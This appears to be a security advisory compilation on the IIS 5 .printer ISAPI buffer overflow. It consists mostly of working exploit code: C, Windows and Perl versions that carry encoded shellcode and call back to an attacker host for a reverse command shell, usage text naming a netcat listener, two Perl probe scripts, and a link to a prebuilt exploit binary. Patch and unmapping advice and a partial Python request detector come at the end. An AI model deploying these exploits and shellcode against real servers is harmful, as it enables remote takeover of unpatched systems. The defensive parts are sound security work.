    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
    "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
    "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";

            int                     s;
            unsigned short int      a_port;
            unsigned long           a_host;
            struct hostent          *ht;
            struct sockaddr_in      sin;

            printf("iis5 remote .printer overflow.\n"
                    "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");

            if (argc != 5){
                    printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
                    exit(1);
            }

            if ((ht = gethostbyname(argv[1])) == 0){
                    herror(argv[1]);
                    exit(1);
            }

            sin.sin_port = htons(atoi(argv[2]));
            a_port = htons(atoi(argv[4]));
            a_port^=0x9595;

            sin.sin_family = AF_INET;
            sin.sin_addr = *((struct in_addr *)ht->h_addr);

            if ((ht = gethostbyname(argv[3])) == 0){
                    herror(argv[3]);
                    exit(1);
            }

            a_host = *((unsigned long *)ht->h_addr);
            a_host^=0x95959595;

            sploit[441]= (a_port) & 0xff;
            sploit[442]= (a_port >> 8) & 0xff;

            sploit[446]= (a_host) & 0xff;
            sploit[447]= (a_host >> 8) & 0xff;
            sploit[448]= (a_host >> 16) & 0xff;
            sploit[449]= (a_host >> 24) & 0xff;

            if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                    perror("socket");
                    exit(1);
            }

            printf("\nconnecting... \n");

            if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
                    perror("connect");
                    exit(1);
            }

            write(s, sploit, strlen(sploit));
            sleep (1);
            close (s);

            printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
            exit(0);
    }

    Wanderley J. Abreu Jr coded a very simple vulnerability test that
    triggers the fault but carries no shellcode to control the
    overwritten EIP register.

    #!/usr/bin/perl
    # Exploit By storm@stormdev.net
    # Tested with success against Win2k IIS 5.0 + SP1
    # Remote Buffer Overflow Test for Internet Printing Protocol
    # This code was written after eEye brought this issue in BugTraq.


    use Socket;


    print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";

    if (not $ARGV[0]) {
	    print qq~
 		    Usage: webexplt.pl <host>
	    ~;
    exit;}


    $ip=$ARGV[0];

    print "Sending Exploit Code to host: " . $ip . "\n\n";
    my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: " .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
    print "Results:\n";

    if (not @results) {
	    print "The Machine tested has the IPP Vulnerability!";
    }
    print @results;

    sub sendexplt {
            my ($pstr)=@_;
	    $target= inet_aton($ip) || die("inet_aton problems");
            socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                    die("Socket problems\n");
            if(connect(S,pack "SnA4x8",2,80,$target)){
                    select(S);
		    $|=1;
                    print $pstr;
		    my @in=<S>;
   	            select(STDOUT);
	            close(S);
                    return @in;
            } else { die("Can't connect...\n"); }
    }

    After patching servers, webexplt.pl will still report servers as
    vulnerable.  That's because webexplt.pl sends a string that is too
    long.  It reports that the server is vulnerable if it doesn't
    return a response.  Microsoft's patch causes the server to not
    return a response for any Host: value greater than 256 bytes in
    length, so the behavior of webexplt.pl is the same for servers
    that are patched and unpatched.  To get around this, send 257
    bytes and interpret the results as follows:

        - If no response is returned the system has been patched.
        - If a 500 error is returned the server is unpatched.
        - If  a 404  error is  returned the  .printer mapping has been
          removed.

    Below is a script based on webexplt.pl that works correctly.

    #!/usr/bin/perl
    # By paul@moquijo.com
    # Based on code by storm@stormdev.net
    # Tested with success against Win2k IIS 5.0 (+ SP1)
    # Remote Buffer Overflow Test for Internet Printing Protocol
    # This code was written after eEye brought this issue in BugTraq.
    
    
    use Socket;
    
    
    print "-- IPP - IIS 5.0 Vulnerability Test --\n\n";
    
    if (not $ARGV[0]) {
	    print "\tUsage: $0 <host>\n\n";
	    exit;
    }
    
    
    $ip=$ARGV[0];
    
    print "Sending test probe to host: " . $ip . "\n\n";
    my $result=join('',sendexplt("GET /NULL.printer HTTP/1.1\n" . "Host: " . "A" x 257 . "\n\n"));
    
    if (not $result) {
	    print "The server tested has been patched for the IPP vulnerability\n\n";
	    exit;
    }
    
    if ($result =~ /HTTP\/1\.1 500/) {
	    print "The server tested has the IPP vulnerability!\n\n";
	    exit;
    }
    
    if ($result =~ /HTTP\/1\.1 404/) {
	    print "The server has had the .printer mapping removed.\n\n";
	    exit;
    }
    
    print "An unexpected response has been received:\n";
    print $result;
    exit;
    
    sub sendexplt {
            my ($pstr)=@_;
	    $target= inet_aton($ip) || die("inet_aton problems");
            socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                    die("Socket problems\n");
            if(connect(S,pack "SnA4x8",2,80,$target)){
                    select(S);
		    $|=1;
                    print $pstr;
		    my @in=<S>;
   	            select(STDOUT);
	            close(S);
                    return @in;
            } else {
		    die("Can't connect...\n");
	    }
    }

    On  many  servers,  the  .printer  mapping  will  automatically be
    reinstated when the IIS  5 server is rebooted.   There is a  local
    policy called  "Web Based  Printing" that  can cause  the .printer
    mapping to be automatically recreated even if manually removed.

    Another version of the same exploit, written for Windows (Winsock):

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    // #include <winsock2.h>

    int main(int argc, char *argv[])
    {
    WSADATA wsaData;
    unsigned short int netcatport;
    unsigned long netcathost;
    struct sockaddr_in sin;
    int sock;
    struct hostent *nchostname;

    WSAStartup((MAKEWORD(2, 2)), &wsaData);

    unsigned char exploit[] =
    "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
    "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
    "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
    "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
    "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
    "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
    "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
    "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
    "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
    "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
    "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
    "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
    "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
    "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
    "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
    "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
    "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
    "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
    "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
    "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
    "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
    "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
    "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
    "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
    "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
    "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
    "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
    "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
    "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
    "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
    "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
    "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
    "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
    "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
    "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
    "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
    "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
    "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
    "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
    "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
    "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
    "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
    "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
    "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
    "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
    "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";

    printf("\nIIS5 printer bufferflow exploit of riley@eeye.com");
    printf("\nShell code by dspyrit@beavuh.org");
    printf("\nPorted to windows by CyrusTheGreat@Hushmail.com");
    printf("\nBoro Hal Kon! \n");

    if (argc != 5)
    {
    printf("IIS5HACK <IIS Server> <port (80|443)> <netcat host> <netcat listen port>\n");
    exit(1);
    }

    if (!gethostbyname(argv[1]))
    {
    printf("Error: Cannot resolve server host name!\n");
    exit(2);
    }

    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_family = AF_INET;
    sin.sin_addr = * ((struct in_addr *)nchostname->h_addr);

    if (!(nchostname = gethostbyname(argv[3])))
    {
    printf("Error: Cannot resolve netcat host name!\n");
    exit(3);
    }

    netcatport = htons(atoi(argv[4]));
    netcatport^=0x9595;
    netcathost = * ((unsigned long *)nchostname->h_addr);
    netcathost^=0x95959595;

    exploit[441] = (netcatport) & 0xff;
    exploit[442] = (netcatport >> 8) & 0xff;
    exploit[446] = (netcathost) & 0xff;
    exploit[447] = (netcathost >> 8) & 0xff;
    exploit[448] = (netcathost >> 16) & 0xff;
    exploit[449] = (netcathost >> 24) & 0xff;

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
    exit(4);
    }

    if ((connect(sock, (struct sockaddr *) &sin, sizeof(sin))) == -1)
    {
    printf("\nError: Cannot connect %s\n", argv[1]);
    exit(5);
    }

    printf("\nConnecting %s ...\n", argv[1]);
    printf("\nSending exploit...");
    if(send(sock, (char*)exploit, 1182, 0) == 1182)
    printf("OK\n");
    else
    printf("Failed\n");
    Sleep(1);
    closesocket(sock);
    WSACleanup();
    }

    Perl port:

    #!/usr/bin/perl
    # IIS5 remote W2K ISAPI printer buffer overflow exploit (sp 0 and sp 1 )
    # Vulnerability found by Riley Hassell <riley@eeye.com>
    # Shell code by: dark spyrit <dspyrit@beavuh.org>
    # Ported to perl by CyrusTheGreat@Hushmail.com
    # shell code spawns a reverse CMD shell , you should setup a listener ..
    # use nc11nt for Windows platform, nc for Unix
    # nc -l -v -t -p <attacker port >
    # Tested on windows (activestate perl ) for portability,
    # Shouts to persian bi bokhars,

    # Cyrus.pl ver 1.0 Ported to perl by CyrusTheGreat@hushmail.com , April 3rd 2001

    $ARGC=@ARGV;
    if ($ARGC <3) {
      print "\n Usage:\n\n $0 <victim host> <listen host> <listen port>\n\n";
      print "        Victim Host: Address of IIS5 server to own \n";
      print "        Listen host: Attacker host IP address \n";
      print "        Listen port: Port number of netcat listener\n\n";
      exit;
    }
    use Socket;

    my($remote,$port,$iaddr,$paddr,$proto,@exploit);
    $remote=$ARGV[0];
    $port = 80 ;
    $myaddr=$ARGV[1];
    $myport=$ARGV[2];
    $iaddr = inet_aton($remote) or die "INET_ATON Error: $!";
    $netcathost = inet_aton($myaddr);
    $netcatport = pack(n,$myport);
    $netcathost = $netcathost ^ pack(N,0x95959595);
    $netcatport = $netcatport ^ pack(n,0x9595);
    $paddr = sockaddr_in($port, $iaddr) or die "SOCKADDR_IN Error: $!";
    $proto = getprotobyname('tcp') or die "GETPROTOBYNAME Error: $!";
    #$proto = 0;
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "SOCKET Error: $!";
    setsockopt(SOCK, SOL_SOCKET, SO_SNDBUF, 2000) or die "SETSOCKOPT Error:$!";
    #change the buffer to appropriate size
    print "\nConnecting...";
    connect(SOCK, $paddr) or die "CONNECT Error: $!";

    @exploit = ("\n","GET /NULL.printer HTTP/1.0\n" , "\x43\x79\x72\x75\x73\x3a\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
    , "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
    , "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
    , "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
    , "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
    , "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
    , "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
    , "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
    , "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
    , "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
    , "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
    , "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
    , "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
    , "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
    , "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
    , "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
    , "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
    , "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
    , "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
    , "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
    , "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
    , "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97$netcatport\x52\xd2\x91$netcathost"
    , "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
    , "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
    , "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
    , "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
    , "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
    , "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
    , "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
    , "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
    , "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
    , "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
    , "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
    , "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
    , "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
    , "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
    , "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
    , "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
    , "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
    , "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
    , "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
    , "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
    , "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    , "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
    , "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
    , "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a" );

    print "\nSending exploit...";
    foreach $msg(@exploit) {
      send(SOCK, $msg, 0) or die "\nUnable to send exploit: $!";
    }
    sleep(1);
    close(SOCK);
    print "\nExploit sent.. You may need to send a CR on netcat listenning port \n";
    exit();

    Gary  Bense  found  this  win32  binary  executable for the remote
    .printer IIS 5 vulnerability.

        http://diseyes.lycaeum.org/backbinp.exe

SOLUTION

    eEye Digital Security released SecureIIS, which stops both known
    and unknown IIS web server vulnerabilities.  Their SecureIIS  code
    base from about 4 weeks  ago actually stopped this latest  IIS 5.0
    buffer overflow  vulnerability without  actually knowing  anything
    about  it.   It  is  this  power  to  stop  both known and unknown
    vulnerabilities  that  sets  SecureIIS  apart  from  every   other
    security product in the market. Visit

        http://www.eeye.com/SecureIIS

    to learn more about this groundbreaking product.

    A patch is available to  fix this vulnerability.  Please  read the
    Security Bulletin:

        http://www.microsoft.com/technet/security/bulletin/ms01-023.asp

    for information on obtaining this patch.

    Also eEye Digital Security recommends removing the .printer  ISAPI
    filter from your web server if it does not provide your web server
    with any _needed_ functionality.

    If you use the Internet  Services Manager to unmap the  extension,
    you should be aware that  this setting can be overridden  by group
    policy.  Specifically, if Computer Configuration |  Administrative
    Templates | Printers | Web-based Printing is enabled, it will take
    precedence  over  the  settings  in  the  ISM.   (By default, this
    setting is not configured).  If you decide to unmap the  extension
    rather than apply the patch,  please be sure to verify  that group
    policy won't reinstate the extension.
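    Until the patch is confirmed installed or the mapping is confirmed gone, the
    request shape both exploits above share (a .printer URI whose Host: or other
    header values carry hundreds of bytes of raw machine code) can be flagged at a
    reverse proxy or in a packet capture.  The detector below is an added example,
    not code from the advisory; the 256-byte Host limit and the sample requests are
    constructed assumptions.

```python
HOST_LIMIT = 256  # assumed threshold: longest Host value you expect from legitimate clients


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers).
    Tolerates bare LF line endings and a leading blank line (the Perl port
    above sends a bare newline before the request line)."""
    head = raw.lstrip(b"\r\n").split(b"\r\n\r\n", 1)[0]
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        return None
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def check_request(raw: bytes, host_limit: int = HOST_LIMIT):
    """Return a list of findings; an empty list means the request looks benign."""
    parsed = parse_request(raw)
    if parsed is None:
        return ["malformed request line"]
    _method, path, headers = parsed
    findings = []
    if not path.lower().endswith(b".printer"):
        return findings  # only the .printer ISAPI mapping is in scope here
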